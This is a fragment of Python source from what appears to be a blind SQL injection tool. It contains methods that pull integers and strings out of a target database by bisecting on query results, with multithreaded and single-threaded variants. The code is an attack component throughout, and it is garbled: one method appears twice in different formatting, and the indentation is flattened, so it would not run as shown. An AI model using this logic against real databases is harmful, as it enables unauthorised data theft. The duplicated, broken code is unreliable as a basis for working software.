def get_blind_int(self, sql): """ Extract an integer through blind SQL injection """ pool = AsyncPool(self) if self.context.is_multithread(): pool.add_bisec_task(sql, 0, self.limit_count_max) else: pool.add_classic_bisec_task(sql, 0, self.limit_count_max) pool.solve_tasks() return pool.result[0]
def get_blind_str(self, sql): """ Extract a string through a blind SQL injection """ size = self.get_blind_int(self.forge.string_len(sql)) if size==(self.limit_count_max-1): raise OutboundException() if self.context.is_multithread(): pool = AsyncPool(self) for p in range(size): pool.add_bisec_task(self.forge.ascii(self.forge.get_char(sql,p+1)),0,255) pool.solve_tasks() return pool.get_str_result() else: result = '' for p in range(size): pool = AsyncPool(self) pool.add_classic_bisec_task(self.forge.ascii(self.forge.get_char(sql, p+1)), 0, 255) pool.solve_tasks() result += pool.get_str_result() return result
def get_blind_str(self, sql): """ Extract a string through a blind SQL injection """ size = self.get_blind_int(self.forge.string_len(sql)) if size == (self.limit_count_max - 1): raise OutboundException() if self.context.is_multithread(): pool = AsyncPool(self) for p in range(size): pool.add_bisec_task( self.forge.ascii(self.forge.get_char(sql, p + 1)), 0, 255) pool.solve_tasks() return pool.get_str_result() else: result = '' for p in range(size): pool = AsyncPool(self) pool.add_classic_bisec_task( self.forge.ascii(self.forge.get_char(sql, p + 1)), 0, 255) pool.solve_tasks() result += pool.get_str_result() return result